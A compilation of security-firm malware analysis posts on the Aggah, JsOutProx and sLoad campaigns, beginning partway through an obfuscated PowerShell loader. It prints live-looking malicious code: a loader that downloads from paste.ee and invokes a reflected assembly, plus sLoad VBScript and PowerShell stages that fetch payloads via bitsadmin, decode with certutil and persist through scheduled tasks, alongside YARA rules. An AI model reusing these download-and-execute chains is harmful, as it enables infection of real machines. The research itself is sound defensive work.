i9i9.Run("P" + "o" + "w" + "e" + "r" + "s" + "h" + "e" + "l" + "l" + "." + "e" + "x" + "e -noexit [Byte[]]$sc64= iex(iex('(&" + "(GCM *W-O*)'+ 'Net.'+" + "'WebC'+'l" + "ient)'+'.Do" + "w'+'nload'+'Str'+'ing(''https://p" + "aste.ee/r/6EdQX'').repl" + "ace(''*^*'',''^%$'').r" + "e" + "p" + "l" + "a" + "c" + "e" + "(''^%$'',''0x'')'));[<##>" + "Ap" + "pDomain<##>]::<##>('(" + "&[email protected]#$%^&*(urrent" + "Domain'.rep" + "lace('(&[email protected]#$%^&*(','C'))<##>.<##>('%" + "*&^*&^*&^*&^*&oad'.r" + "eplace('%" + "*&^*&^*&^" + "*&^*&" + "','L'))(" + "$sc64).'EntryP" + "oint'<##>.<##>('in*&^*" + "&^*&^&*^*&^o" + "k))*()*)(**(&(*&'.r" + "e" + "p" + "l" + "a" + "c" + "e" + "('))*()*)(**" + "(&(*&','e').r" + "e" + "p" + "l" + "a" + "c" + "e" + "('*&^" + "*&^*&^&*^*&^','v'))($null,$null)"),0

self.close
</script>

Code Snippet 3

This last binary actually is a hacking tool implementing the CMSTP Bypass technique, a technique used to bypass Windows UAC prompts. 

According to the Microsoft Documentation, “Connection Manager is a suite of components that provides administrators with the ability to create and distribute customized remote access connections and to create, distribute, and automatically update customized phone books.”.

However, the cyber attackers could exploit an infected INF file to execute arbitrary commands bypassing the UAC, elevating privileges in a stealthy way. In this case the CMSTP Bypass technique implemented into a .NET executable. 

  Figure 10: Synthesis of the CMSTP Bypass technique

The Payload

As we saw in the past, Aggah used to change its payloads during time, and this time we observed that the delivered malware was not RevengeRAT. It rather was a LokiBot variant. This info stealer is well-known in the community since 2016 and it was deeply analyzed in the course of the years. 

In this case, it has the following configuration:

Figure 11: Loki Bot configuration with communication to the C2

The December Payloads

As anticipated before, Aggah payloads are quite dynamic. According to the some observation of community researches such as @DrStache, the Aggah pastebin accounts were dropping AZOrult infostealer few days before the Lokibot observation. 

Investigating the c2 infrastructure through the Azorult-Tracker services, we noticed the AZOrult malware distributed by Aggah in that period was targeting a modest number of victims mainly located in the United States, United Arab Emirates and also Pakistan, Germany and Israel. 

Conclusions

The Aggah actor keeps threatening organizations all around the world. During the time it built a custom stager implant based on legit third parties services, such as Pastebin and BlogSpot, abused by the actor to manage the infected hosts and to run its botnet without renting a server. 

During the last year we contributed to the joint effort to track its activities, along with PaloAlto’s Unit42, and after a year we can confirm it is still active and dangerous. At the moment it is not clear if this actor is just selling its hacking services or running its own campaigns, or both.

In conclusion, there is no hard evidence confirming or denying its potential relationships with the Gorgon APT, and factors like the different nationalities and the small amount of victims connected to December Aggah activities, does not help to exclude it.

Indicators of Compromise

Yara Rules

rule YAKKA3_Campaign_Jan_20_PPA_Macro {
	meta:
  	description = "Yara Rule for Yakka3 campaign macro PPA document"
  	author = "Cybaze Zlab_Yoroi"
  	last_updated = "2020-01-23"
  	tlp = "white"
  	category = "informational"

	strings:
   	 $a1 = { 1A 88 63 8D A9 78 43 FF }
	 $a2 = { 0D 1B 43 00 1B 44 00 FB 30 1C 33 }
	 $s1 = "Shell" 

    condition:
   	 all of them
}

rule YAKKA3_Campaign_Jan_20_Injector_Module {
	meta:
  	description = "Yara Rule for Yakka3 campaign Injector module"
  	author = "Cybaze Zlab_Yoroi"
  	last_updated = "2020-01-23"
  	tlp = "white"
  	category = "informational"

	strings:
	 $s1 = "vroombrooomkrooom" 
	 $s2 = "kekedoyouloveme" 
	 $s3 = "WriteProcessMemory"
	 $a1 = { 00 ED 08 8C 05 31 00 ED 08 43 }

    condition:
   	 uint16(0) == 0x5A4D and all of them
}

rule YAKKA3_Campaign_Jan_20_CMSTP_Bypass {
	meta:
  	description = "Yara Rule for Yakka3 campaign CMSTP Bypass"
  	author = "Cybaze Zlab_Yoroi"
  	last_updated = "2020-01-23"
  	tlp = "white"
  	category = "informational"

	strings:
	 $s1 = "cmstp.exe" ascii wide
	 $s2 = "CurrentVersion" ascii wide 
	 $s3 = "INF" ascii wide
	 $a1 = { 0A 06 8E 69 2D 06 7E 18 }

    condition:
   	 uint16(0) == 0x5A4D and all of them
}

rule YAKKA3_Campaign_Jan_20_LokiBOT_Payload {
	meta:
  	description = "Yara Rule for Yakka3 campaign Loki bot Payload"
  	author = "Cybaze Zlab_Yoroi"
  	last_updated = "2020-01-23"
  	tlp = "white"
  	category = "informational"

	strings:
	 $s1 = "Fuckav.ru" ascii wide
	 $s2 = "SOFTWARE" wide 

    condition:
   	 uint16(0) == 0x5A4D and $s1 and #s2 > 10
}

This blog post was authored by Luigi Martire and Luca Mella of Cybaze-Yoroi Z-LAB

Unveiling JsOutProx: A New Enterprise Grade Implant

Introduction

During our threat intelligence source monitoring operations, we spotted a new sophisticated malware implant that seems to be unrelated to mainstream cyber weapons. In fact, the recovered sample raised many interrogatives into the malware research community due to the extensive  usage of obfuscation anti-reverse techniques, hardening the investigative efforts. 

For this reason, we decided to dig into this piece of malware and figure out its inner secrets, uncovering a modular architecture with advanced offensive capabilities, such as the presence of functionalities able to deal with multi factor authentication (MFA).

Technical Analysis

Hash6bf0d9a7ca91f27a708c793832b0c7b6e3bc4c3b511e8b30e3d1ca2e3e2b90a7
ThreatJsOutProx
Brief DescriptionMalicious JS file
Ssdeep12288:9jAtRUr07Jo0W9vrd6ye8hKaVimlc+/eHFca7 +mJO1Za6D4aYQZdV81u34YYbga0:RAO07JbAvrsype6lZTv

Table 1. Sample information

The starting point is a Javascript file containing more than ten thousand lines of heavily obfuscated code. 

The first line of this file embeds a huge array of Base64 encoded elements, but its raw decoding led only to other incomprehensible data, evidencing the presence of a more complex layer of protection.

Figure 1. Array with Base64 encoded elements.

Navigating the code, we identified a series of instructions resembling a sort of initialization that grabbed our attention. The function “t_ey” is used as deobfuscation function for some of the  string chucks preconfigured into the “t_ep” array, enabling us to recover some cleartext.

This initial code cleanup revealed interesting information such as some of the static configuration initialized during the initial malware execution stages. Among these info, we recovered also its remote C2 address 91.189.180.199, operated by “ServeTheWorld”, an Norwegian provider renting his servers in Oslo, and a particular tag reporting the name “JsOutProx”. Extremely characteristic.

Figure 2. Initialization of basic malware information.

Continuing to analyze the code, we reconstructed the approach used by the attacker to obfuscate the payload: all the necessary information has been encrypted, splitted, and then encoded in Base64 chunks stored into different structures named as “ta”, “t_ep”, “t_eq”.

Figure 3. Other structures containing Base64 data.

As anticipated before, thanks to the decoding routine “t_ey” it is possible to retrieve at runtime the cleartext code to reify the structure of the malware, stored in the “t_fT” object visible in the next figure.

Figure 4. Core structure of the malware.

The structure contains objects and functions used by the malware to pursue its malicious actions. In many cases we noticed a naming correspondence between couples of objects, for example between “Outlook” and “OutlookPlugin”, or “Proxy” and “ProxyPlugin” objects. This indicates the malware has a modular structure containing specific plugins able to perform a wide range of actions, such as exfiltrate data by populating the associated object. For example, the "OutlookPlugin" is able to steal information about emails and contacts and it does that by filling the Outlook object shown in the previous figure.

Each plugin embeds an obfuscated function named “receive”, which has the purpose to perform the specific action. This function name is constant and represent a sort of common interface between malware modules.

Figure 5. “receive” function into “InfoPlugin”.

Check-in and Command List

Once created the main structure, the first function ran by the malware is “init”. It is designed to create an identification string for the victim machine, gathering from system information and storing them into the “t_fT[“ID”]” variable

As visible the next picture, the identification string is composed using the computer name, username, OS version. Then, an additional suffix will be appended to it containing the current action the malware is performing. In this specific case it is “ping”, a sort of heartbeat to make sure the command and control services is up and running.

Figure 6. Creation of victim ID.

Then, the malware moves in an endless loop in which it invokes the “receive” function every 5 seconds. Substantially, this function is an interface that allows the attacker to interact with the implant.

The malware, in fact, connects to the C2 and retrieves a string indicating the next command to execute into the “np[0x0]” variable. It has many capabilities and it able to handle a complete infection life-cycle. It can update itself, restart itself, execute another JavaScript code, other VB scripts and even remove its traces.

Figure 7. Switch structure with supported commands.

Summing up, the analyzed version of the implant supports the following actions:

CommandAction
updUpdate the implant
rstRestart the implant
l32Start another process with the same script
dcnKill the implant
rbtReboot the machine
shdShutdown the machine
lgf??
ejsEvaluate Javascript code
epg??
evbExecute VisualBasic code
idn??
sdnLoad a .NET dll
uisUninstall the implant
insInstall the implant
int.gSend the sleep time to C2
int.sUpdate the sleep time

Table 2. Supported commands.

Additionally, the default case of the main loop structure includes a series of IF-Else evaluating the received string in order to check for specific prefixes. Each prefix is associated to a plugin module.

Figure 8. Invocation of plugins.

Analyzing this selection chain was possible to reconstruct the full list of supported plugin for this version of the implant.

CommandPlugin
prProcessPlugin
clClipboardPlugin
fiFilePlugin
lbLibraryPlugin
doDownloadPlugin
scScreenPlugin
ouOutlookPlugin
pxProxyPlugin
cnShellPlugin
tkTokensPlugin
inInfoPlugin
dsDnsPlugin
pmPromptPlugin

Table 3. Malware’s plugins.

At this point, all the attention moves on understand what the functions and the plugins do and how they work. So, we provide, in the next paragraphs, a brief view of the most interesting functions and plugins.

Persistency

By the way, to ensure its survival after reboot, the malware writes a copy of the initial JS script into the “%appdata%” and “%temp%” folder, setting the persistence on the system through the popular “HKCU\Software\Microsoft\Windows\CurrentVersion\Run” registry key.

Figure 9. Setting of persistence.

Plugin Modules

The number of supported plugin indicates the malware is pretty mature and extremely dangerous. Some of these supported plugins encode standard functionalities of many RAT and recon malware, but some of them hides interesting and even uncommon features. 

The “Process” Plugin

The ProcessPlugin is able to manipulate other processes running in the system. It can kill them by PID and by name, create new processes through WSH or WMI and also collect a memory dump of a specific process. This is an uncommon feature for a common malware, it might indicate operators behind its command and controls could have analytical skills in order to investigate the surrounding environment, or also exfiltrate data through memory scraping.

Figure 10. Part of ProcessPlugin code.

The “Dns” Plugin

The DnsPlugin handles the machine’s DNS configuration. It can send to the C2 the current configuration and also set a new one, just like visible in the following screen.

Figure 11. Part of DnsPlugin code.

The “Token” Plugin and the Object SymantecVIP 

This plugin is particularly interesting. The name refers to the exfiltration of some type of token. However, the plugin is specifically designed for the theft of SymantecVIP One Time Password, the multifactor authentication technology used in enterprise grade Single-Sign-On services adopted in many corporate environments.

Figure 12. Part of TokenPlugin code.

The “Outlook” Plugin

Instead, the OutlookPlugin weaponize the implant with common information stealing capabilities enabling the attackers to gather account information and contact list.

The interesting part of this plugin is that it is the only one info-stealing plugin embedded in the malware.

Commodity malware typically include support to multiple email clients, web browsers and ftp clients, but this one just handle Outlook: the de facto standard email client installed in the majority of enterprise environment.

Figure 13. Part of OutlookPlugin code.

The “Prompt” Plugin

Another interesting functionality is provided by the PromptPlugin. It empowers the attacker to present his victim a custom message prompt provided by the command and control server.

Figure 14. Part of PromptPlugin code.

The Bridge Between JS and .NET

All the JavaScript plugins seem to be only an high-level interface used by the attacker to communicate with his implant. Digging into the code to search for the implementation of the plugins, we come across another mysterious component named “DotUtil” which seems to be the link between the JavaScript interface and the implementation of the actual operations. 

Also, digging the JS code, a method called “hasDotnet” made us wondering about the existence of additional .NET artifacts which may hide the implementation of some of the above-mentioned functionalities. Moreover, this method contains references to the download and the memory loading of an instance of a “DotUtil” module.

Figure 15. Part of DotUtil module.

Dynamically analyzing the malware, we were able to intercept the download of a .NET DLL called “libDotJs.dll”. Analyzing it, we discover a complete mapping between the functions implemented in it and the ones declared into “DotUtil” component. 

Figure 16. Mapping between DotUtil and .NET DLL.

From a wider perspective, we can assert with a good confidence that the implant is composed of at least two different layers: the JavaScript interface, delivered to the target machine as first stage and subject to continuous changes to lower its detectability, providing the core mechanism to ensure a flexible access to the target machine, and an advanced functional layer leveraging .NET dependencies. 

Figure 17. Macro perspective of the malware composition.

Conclusion

The complexity and the engineering grade of this threat, dubbed JsOutProx, are an element of uniqueness in the current panorama. It is a toolkit with peculiar remote access capabilities. From an architectural point of view, JsOutProx contains all the function prototypes inside the core engine and could be remotely extended at run time. 

The implementation of its functionalities has been decoupled from the JavaScript core using shared interfaces realized through the “dotUtil” class, the loader of its NET plugins. These classes are provided remotely through serialization, this decoupling provides a malleable modular implementation enabling the implant operators to a versatile code management. 

Another relevant aspect of JsOutProxy is the capability to deal with SymantecVIP technology. This led us to think that, this implant, has been designed to hit High-Value targets. Also, this new threat appears emerging during these days, it has never been publicly seen before this December and it is probably still under development.

Cybaze-Yoroi Zlab will continue to actively hunt for it.

Indicator of Compromise

Hashes:

C2:

Yara Rules

rule JsOutProx_Dec_2019{
	meta:
  	description = "Yara Rule for JsOutProx"
  	author = "Cybaze Zlab_Yoroi"
  	last_updated = "2019-12-19"
  	tlp = "white"
  	category = "informational"

	strings:
   	 $re1 = /,'([0-9a-zA-Z])+=',/
	 $re2 = /[a-zA-Z]{1}_[a-zA-Z]{2}\[0x/
   	 $a1 = "WScript"
	 $a2 = "0x"
    condition:
   	 $re1 and $a1 and #a2>20000 and #re2>1000
}

This blog post was authored by Antonio Farina, Luca Mella and Antonio Pirozzi of Cybaze-Yoroi Z-LAB

The sLoad Threat: Ten Months Later

Introduction

SLoad (TH-163) is the protagonist of increasing and persistent attack waves against the Italian panorama since Q3 2018 and then in 2019 (e.g N020419, N040619, N010819), but also against the UK and Canada as reported by Proofpoint. Ten months ago, we wrote about the complex infection chain the sLoad malware threat was using during its attack campaigns, and today we are looking at the evolution of the threat by dissecting one of its latest attacks.

During our CSDC monitoring operation, we recently noticed some changes in the infamous attack waves related to sLoad, which is known for adopting a complex infection chain using to spread additional malware. For this reason Cybaze-Yoroi ZLAB dissected one latest ones.

Technical Analysis

According to CERT-PA investigations, the malware has recently been delivered using legit certified emails (PEC). These recent attack waves were targeting Italians Organizations and   consultants affiliated to Professional associations, such as lawyers and civil engineers. Once again the attachment is a malicious zip. 

Figure 1: Example of mail (source:CERT-PA)

The Infection Chain

Figure 2: Files contained in attachment file zip

This time the zip does not hide powershell code, such the appended one recovered in the past waves. The archive contains two files: a corrupted PDF file and a VBScript. The first one is designed to deceive the unaware user and force him to open the runnable script.

In the following tables are shown some basic information about samples contained in the zip archive.

Hash30d6f6470e145a1d1f2083abc443148c8e3f762025ca262267ae2e531b2e8ab4
Threat.vbs dropper
Brief DescriptionSload visual basic script loader
Ssdeep192:Fb1TpsF8Z1mZcwfD0VCmA7VETYM/2IVKfCH:FbQjZZfDsA7G2zfCH

Table 1: Information about SLoad .vbs dropper

Hash43db5fcb75d50a5516b687b076be5eb1aaec4b51d8d61a60efc69b383c1d757c
Threat.pdf file
Brief DescriptionSload corrupted pdf file
Ssdeep1536:mmD8g29U+A092Ljr/N0VyvD/ABVqYA7hq4XoZxXjdY4u/dQV:FdLKQjrFgyvsB0YA1q4YZxpWQV

Table 2: Information about SLoad .pdf file

Opening the vbs dropper is possible to see an obfuscated script containing several junk instructions like unused variables and commented codes. After a deobfuscation phase is possible to see the inner logic. The purpose of this script is launch start a powershell script retrieved from the attacker infrastructures and, in the meantime, decoy the victim.

On Error Resume Next
Set ZCzG   = CreateObject("Scripting.FileSystemObject")
Set PavfQt = WScript.CreateObject ("WScript.Shell")
Set XaiX = ZCzG.GetFolder("c:\Users\")
Recurse(XaiX)
PavfQt.run "bitsadmin /transfer OkFCVS /download /priority FOREGROUND https://dreamacinc.com/UCP9dATGyt6mJ/srdzHcN4bWUum.jpg c:\Users\Public\Downloads\RSbYHuPO.ps1",0,True
i=0
Do While i < 1
    If (ZCzG.FileExists("c:\Users\Public\Downloads\RSbYHuPO.ps1")) Then
   	 i=1
    End If
    WScript.Sleep(2280)
Loop
PavfQt.run "powershell.exe -ep bypass -file c:/users/public/downloads/RSbYHuPO.ps1 ",0,True
Sub Recurse(JFLY)
    If IsAccessible(JFLY) Then
   	 For Each oSubFolder In JFLY.SubFolders
   		 Recurse oSubFolder
   	 Next
   	 For Each RIst In JFLY.Files
   		 If InStr(RIst.Name,".pdf") > 0 Then
   			 PavfQt.run "explorer "+JFLY+"\"+RIst.Name
   		 End if
   	 Next
    End If
End Sub
Function IsAccessible(XaiX)
    On Error Resume Next
    IsAccessible = (XaiX.SubFolders.Count >= 0)
End Function

Code snippet 1: Deobfuscated vbs dropper

The malware downloads a fake jpg using the using “bitsadmin.exe”  tool from “hxxps://dreamacinc[.com/UCP9dATGyt6mJ/srdzHcN4bWUum[.jpg”. The usage of native tools allow the script to operate under the radar avoiding several AVs controls. The fake jpg actually contains a powershell script. 

$oLZz2= "C:\Users\admin\AppData\Roaming";
[email protected](1..16);

[...]

$main_ini='76492d1116743f0423413b16050a5345MgB8ADUAVAB4   [...]   AMQAyAGYA';
$main_ini | out-file $PaIQGLoo'\main.ini';

$domain_ini='76492d1116743f0423413b1605   [...]   YwBlAA==';
$domain_ini | out-file $PaIQGLoo'\domain.ini';

[...]

try{ [...]
}catch{$yC0iBerAupzdtf5Z=Get-Process -name powershell*;
    if ($yC0iBerAupzdtf5Z.length -lt 2){
   	 $EXhfbIPG7pUAEZzgZEnM = (Get-WmiObject Win32_ComputerSystemProduct).UUID ;
   	 $r=8;
   	 $B3xcDMBF=$EXhfbIPG7pUAEZzgZEnM.Substring(0,$r);
   	 $zjGQzSypyGPthusR = $047MydhkAAfp1W+"\"+$B3xcDMBF;
   	 [email protected](1..16);
   	 $umwTVcIoudRlXjR6yAQQ= Get-Content "main.ini"$MLUkmHrgbpKyVEt8nS= ConvertTo-SecureString $umwTVcIoudRlXjR6yAQQ -key $sv8eJJhgWV3xAN7Uu;
   	 $AKXy3OFCowsfie = [System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($MLUkmHrgbpKyVEt8nS);
   	 $DBR4S3t = [System.Runtime.InteropServices.Marshal]::PtrToStringAuto($AKXy3OFCowsfie);
   	 Invoke-Expression $DBR4S3t;
    }
} | out-file $PaIQGLoo'\'$H3z9RnzIihO8'.ps1'

$OFHc0H4A=' /F /create /sc minute /mo 3 /TN "S'+$rs+$fLCg9ngJqRHX36hfUr+'" /ST 07:00 /TR "wscript /E:vbscript '+$PaIQGLoo+'\'+$JxdRWnHC+'.tmp"';
start-process -windowstyle hidden schtasks $OFHc0H4A;   [...]

Code snippet 2: Downloaded powershell code

The first action the script  does is to set a scheduled task to grant persistence on the infected machine. Then, after selection a random active process on infected machine (“System” in this specific infection) and concatenation it with the “%AppData%\Roaming” path, it stores four different files in his installation folder.

All of them are embedded in the script; furthermore, two of them (“domain.ini” and “main.ini”)  are encrypted using the “ConvertFrom-SecureString”  native function. Then, the script runs the “UoqOTQrc.tmp” file, having the only purpose to execute the “UoqOTQrc.ps1” file contained in the same folder.

Figure 3: Files created in “%AppData%\Roaming\<active_process>\”
Dim str, min, max
Const LETTERS = "abcdefghijklmnopqrstuvwxyz"
min = 1
max = Len(LETTERS)
Randomize

[...]

Set objFSO=CreateObject("Scripting.FileSystemObject")
Set winssh = WScript.CreateObject ("WScript.Shell")
fName=RandomString(10)
JAcalshy=RandomString(4)
fZgxNPDMnu=RandomString(4)
WEHxctVdTEoDfqEqJMP=RandomString(4)

[...]

Set objFile = objFSO.CreateTextFile(outFile,8, True)
objFile.Write "Set "+JAcalshy+"=rshe" & vbCrLf
objFile.Write "Set "+fZgxNPDMnu+"=ypa" & vbCrLf
objFile.Write "Set "+WEHxctVdTEoDfqEqJMP+"=il" & vbCrLf
objFile.Close
winssh.run "powershell -ep bypass -file .ps1",0,true

Code snippet 3: content of “UoqOTQrc.tmp” file.

try{
      Remove-EventLog:Debug-Job
      Export-BinaryMiLog:Get-PSSessionConfiguration
      Remove-JobTrigger:New-Item
}catch{
$yC0iBerAupzdtf5Z=Get-Process -name powershell*;
if ($yC0iBerAupzdtf5Z.length -lt 2){
      $EXhfbIPG7pUAEZzgZEnM = (Get-WmiObject Win32_ComputerSystemProduct).UUID ;$r=8;
      $B3xcDMBF=$EXhfbIPG7pUAEZzgZEnM.Substring(0,$r);
      $zjGQzSypyGPthusR = $047MydhkAAfp1W+"\"+$B3xcDMBF;
      [email protected](1..16);
      $umwTVcIoudRlXjR6yAQQ= Get-Content "main.ini"
      $MLUkmHrgbpKyVEt8nS= ConvertTo-SecureString $umwTVcIoudRlXjR6yAQQ -key $sv8eJJhgWV3xAN7Uu;
      $AKXy3OFCowsfie =
              [System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($MLUkmHrgbpKyVEt8nS);
       $DBR4S3t = [System.Runtime.InteropServices.Marshal]::PtrToStringAuto($AKXy3OFCowsfie);
       Invoke-Expression $DBR4S3t;
}

Code snippet 4: content of “UoqOTQrc.ps1” file.

In the same way, the “UoqOTQrc” script decrypts the “mini.ini” file using the “ConvertFrom-SecureString” function and the ecnryption key contained in “$sv8eJJhgWV3xAN7Uu” variable, a sequential integer array. 

Figure 4: “main.ini” file before and after decryption

The decrypted “main.ini” script tries to ping a URL generated selecting three ascii char-codes in ranges [65-90] and [67-122]. Then, it decrypts “domain.ini” using the key in the “$main_key” variable. In the end, it saves the results in the “btc.log” file. Continuing the analysis of “main.ini” is possible to spot that the script also grabs system information to check-in the newly infected host.

Figure 5: “domain.ini” file before and after decryption

Figure 6: Some information exfiltrate by the malware before and after base64 decoding

At this point, another malicious file is downloaded. The malware retrieves it from “hxxps://<C2_URL>/doc/x2401.jpg”. Once again, this is not a real jpg, but rather another obfuscated powershell layer.

$u2K2MQ4 = "`r`n"
$lNlNrKyk= -join ((65..90) + (97..122) | Get-Random -Count 8 | % {[char]$_})
$yIXgWSaXsKD5hanf9uO= $env:userprofile+'\App'+'Da'+'ta\Ro'+'am'+'ing';
$hh='hi'+'dd'+'en';
[email protected](1..16);
$Erlydjiyy = (Get-WmiObject Win32_ComputerSystemProduct);
$Erlydj = $Erlydjiyy.UUID;
$sOmUGoc0ysV8UW=$Erlydj.Substring(0,6);
$Z5lTNXB = $yIXgWSaXsKD5hanf9uO+"\"+$sOmUGoc0ysV8UW;
If(!(test-path $Z5lTNXB)){New-Item -ItemType Directory -Force -Path $Z5lTNXB}

If(test-path $Z5lTNXB"\_in"){$gQd0DB82ByQ0pziwKZ=Get-ChildItem $Z5lTNXB"\_in";$FQDO2rSjJJxrkrYFWM1W = Get-Date;if ($gQd0DB82ByQ0pziwKZ.LastWriteTime -gt $FQDO2rSjJJxrkrYFWM1W.AddMinutes(-30)){break;break;}}; "1" | out-file $Z5lTNXB"\_in";

try{ Remove-Item $Z5lTNXB'\*'}catch{}

$wsxDITPgQCH+='76492d1116743f0423413b16050a5345MgB8AGsAKwBwAHkASQBUAGgAWgBKAEsAbgBFAE8AUQBHA';
[...]
$wsxDITPgQCH+='UAZAA1AGIAZAA0ADIAYgBkAGUANQAzADIAYgBkAGIAMwBlADMAZQA1ADAAOQA3ADgAYwAyAGYAMgA';
$wsxDITPgQCH+='3ADAANQA1AA==';
$wsxDITPgQCH | out-file $Z5lTNXB'\config.ini';
$5r8DcJB4ok4+='76492d1116743f0423413b16050a5345MgB8AHQAYgBqAFYAVQBQADUAQwBNAGEAZABWAFMA';
[...]
$5r8DcJB4ok4+='YQBiADUAOAAzAGQANAAxADgAMwAxAGYANQAwAGIA';
$5r8DcJB4ok4 | out-file $Z5lTNXB'\web.ini';
start-process -windowstyle $hh schtasks '/change /tn GoFast /disable';
$2aWxu9dutZfOPCCgS+=$u2K2MQ4+'Dim  ';
[...]
$nz0oninX6=$ixXApGeqJKEGY -join ',';
$E6M6Np8nhXnu4ndPEJ=' /F /create /sc minute /mo 3 /TN "U'+$sOmUGoc0ysV8UW+'" /ST 07:00 /TR "wscript /E:vbscript '+$Z5lTNXB+'\'+$lNlNrKyk+'.tmp"';
start-process -windowstyle $hh schtasks $E6M6Np8nhXnu4ndPEJ;

Code snippet 5: Obfuscated content of “x2401.jpg” file.

$u2K2MQ4 = "rn";
$lNlNrKyk= -join ((65..90) + (97..122) | Get-Random -Count 8 | % {[char]$_});
$yIXgWSaXsKD5hanf9uO= $env:userprofile+'\AppData\Roaming';

$Erlydjiyy = (Get-WmiObject Win32_ComputerSystemProduct);
$Erlydj = $Erlydjiyy.UUID;
$sOmUGoc0ysV8UW=$Erlydj.Substring(0,6);
$Z5lTNXB = $yIXgWSaXsKD5hanf9uO+"\"+$sOmUGoc0ysV8UW;
If(!(test-path $Z5lTNXB)){New-Item -ItemType Directory -Force -Path $Z5lTNXB}

If(test-path $Z5lTNXB"\_in"){$gQd0DB82ByQ0pziwKZ=Get-ChildItem $Z5lTNXB"\_in";$FQDO2rSjJJxrkrYFWM1W = Get-Date;if ($gQd0DB82ByQ0pziwKZ.LastWriteTime -gt $FQDO2rSjJJxrkrYFWM1W.AddMinutes(-30)){break;break;}}; "1" | out-file $Z5lTNXB"\_in";

try{ Remove-Item $Z5lTNXB'\*'}catch{}
$wsxDITPgQCH="76492d1 [...] A1AA==";
$wsxDITPgQCH | out-file $Z5lTNXB'\config.ini';

$5r8DcJB4ok4="7649 [...] AGIA";
$5r8DcJB4ok4 | out-file $Z5lTNXB'\web.ini';

start-process -windowstyle hidden schtasks '/change /tn GoFast /disable';

$2aWxu9dutZfOPCCgS="Dim  winssh [...] winssh.run "powershell -ep bypass -file vJjFwtSM.ps1",0,true";
$2aWxu9dutZfOPCCgS | out-file $Z5lTNXB'\'$lNlNrKyk'.tmp'

$r1uIiPZBhUea0=" $zTxePJtpmbVI0btT6cd9=Get-Process -name powershell*; [...] Invoke-Expression $NLO3lwvn1xWn;}";
$r1uIiPZBhUea0 | out-file $Z5lTNXB'\'$lNlNrKyk'.ps1'

$nz0oninX6="1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16";
$E6M6Np8nhXnu4ndPEJ="/F /create /sc minute /mo 3 /TN "U52A34D" /ST 07:00 /TR "wscript /E:vbscript C:\Users\admin\AppData\Roaming\52A34D\vJjFwtSM.tmp";

start-process -windowstyle hidden schtasks $E6M6Np8nhXnu4ndPEJ;

Code snippet 6: Deobfuscated content of “x2401.jpg” file.

Like previous script, this one perform the same operations and create other four file in “%AppData%\Roaming\<active_process>” path. This time the files are:

Figure 7: Files created in “%AppData%\Roaming\<active_process>\”

The first executed file is “<random_name>.tmp”. It is not obfuscated and its only purpose is the execution of “<random_name>.ps1”. The content of “<random_name>.ps1” file is the following. The latest script decrypt the content of “config.ini” file. The following figure shown both encrypted and decrypted “config.ini” file.

Figure 8: Files created in “%AppData%\Roaming\<active_process>\”

This script performs the same operation described in “main.ini” file but use different URLs stored in the “web.ini” file. Also this time, the file is decrypted using an integer array from 1 to 16  as key and contained in “$mainKey” variable.

Figure 9: “web.ini” file before and after decryption

Finally, it tries to download the final payload with the following piece of script. However, at the time of analysis, all the C2 URLs seems to be down, so we are not able to detect the final payload family. 

$dPath = [Environment]::GetFolderPath("MyDocuments")
$jerry=$starsLord+'\'+$roccon+'_'+$rp;   		 
$clpsr='/C bitsadmin /transfer '+$rp+' /download /priority FOREGROUND '+$line+' '+$jerry+'.txt & Copy /Z '+$jerry+'.txt '+$jerry+'_1.txt & certutil -decode '+$jerry+'_1.txt '+$dPath+'\'+$roccon+'_'+$rp+'.exe & powershell -command "start-process '+$dPath+'\'+$roccon+'_'+$rp+'.exe" & exit';
start-process -wiNdowStylE HiddeN $mainDMC $clpsr;
$clpsr='/C del '+$jerry+'.txt & del '+$jerry+'_1.txt & del '+$dPath+'\'+$roccon+'_'+$rp+'.exe & exit';
start-process -wiNdowStylE HiddeN $mainDMC $clpsr;

Code snippet 7: script to download the final payload

Comparison With Previous Chains

To better understand the evolution of sLoad infection chain, we compared attack attempts observed since 2018 and the latest ones. In both cases, the infection vector is a carefully themed malicious email, weaponized with zip archive containing two files. In the first case the starting point is a “.lnk” file and in the second one the chain starts with a “.vbs” script. 

The sLoad attack chain observed months ago was characterized by some pieces of powershell code appended to the tail of the zip archive. Probably, this technique become more detectable during the time, so it could have been deprecated in latest infections attempts. For both malware variants, the archive contains a legit image (or pdf) used to deceive the unaware user. Moreover, in the first analyzed variant, the core of the infection is mainly based on powershell scripts and LOLbins. However, the latest stages uses a mix of Powershell and Visual Basic Scripts.


Figure 10: Infection chain workflow

The agent body is still quite similar in the core structure, however the bot now supports new commands such as “Exec” and “Eval”, the latter is able to download further code through the Bitsadmin utility instead of directly rely on “Net.WebClient” primitive. Also, the “ScreenCapture” function have been removed from the new version of the code, in favor to the enhancement of the agent persistence through scheduled task.

Figure 11: Comparison between old and new version on “config.ini” file

Conclusion

sLoad is keeping evolving their TTPs and represents a vivid threat for the Italian cyber-panorama. Also, many times, especially during the last months, its activities in the country involved the abuse of certified mailboxes (PEC) targeting associated professionals and consultants, along with private companies. Additionally, the quality of the latest phishing emails is high: the group adopted templates and naming conventions actually in use by  Italian Revenue Agency (“Agenzia delle Entrate”).

The plentiful usage of LOLbins, Powershell scripts and SSL encrypted channels, makes detection of this threat difficult for automated systems, and frequently requires analysis abilities or high quality threat intelligence sources to detect and tackle sLoad attack campaigns, many times targeting just a single country.

Indicator of Compromise

Yara Rules

rule SLoad_Sep_2019{
	meta:
  	description = "Yara Rule for Sload campaign 2019"
  	author = "Cybaze Zlab_Yoroi"
  	last_updated = "2019-09-27"
  	tlp = "white"
  	category = "informational"

	strings:
   	 $s1 = {50 4B}
   	 $s2 = {29 7B 0A 33 9D B6 C7 BF}
   	 $s3 = {E7 D5 53 78 3A BD}
   	 $a1 = "IT83440018268.vbs" ascii wide
   	 $a2 = "IT83440018268.pdf" ascii wide
   	 
    condition:
   	 all of ($s*) and 1 of ($a*)
}

rule sload_Sep_2019{
	meta:
  	description = "Yara Rule for Sload vbs script sept 2019"
  	author = "Cybaze Zlab_Yoroi"
  	last_updated = "2019-09-27"
  	tlp = "white"
  	category = "informational"

	strings:
   	 $s1="ZCzG.GetFolder(\"c:\\Users\\\")"
   	 $s2="WScript.Shell"
   	 $s3="https://dreamacinc.com/"
   	 $s4="bitsadmin"
   	 
    condition:
   	 all of them
}

This blog post was authored by Davide Testa and Luca Mella of Cybaze-Yoroi Z-LAB

APT or not APT? What's Behind the Aggah Campaign

Introduction

